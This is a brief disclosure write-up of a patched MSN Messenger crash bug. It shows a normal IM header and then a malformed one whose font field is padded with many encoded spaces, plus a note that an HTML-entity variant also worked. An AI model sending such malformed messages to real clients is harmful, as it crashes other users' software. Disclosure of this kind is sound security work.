
This flaw makes the MSN Messenger client crash after it receives a malformed font variable in the message header of an instant message.
How Does It Work?
The MSN Messenger client sends a header with every message. So every time a user sends a message, the client generates a header containing information about the font, the colour of the message and some other details.
The Flaw
A normal message looks something like this:
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
X-MMS-IM-Format: FN=MS%20Sans%20Serif; EF=B; CO=ff; CS=0; PF=22

hey friend, how are you?
When we replace the font field with something very large, the message will look like this:
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
X-MMS-IM-Format: FN=Times%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20New%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20Roman%20%20%20%20%20%20%20%20%20%20%20; EF=B; CO=ff; CS=0; PF=22

hey friend, how are you?
As a result, the MSN Messenger client crashes. This flaw is a severe danger, as it is not hard for hackers to use it. Microsoft has been informed of this issue. Shortly after it was fixed, it was discovered that using the HTML equivalent: instead of %20 for the spaces produced the same result. This has since been fixed.
Credits
|M|K discovered this bug a while ago, but decided not to go public. Then Xerxes investigated and sent it over to Mess with MSN Messenger.
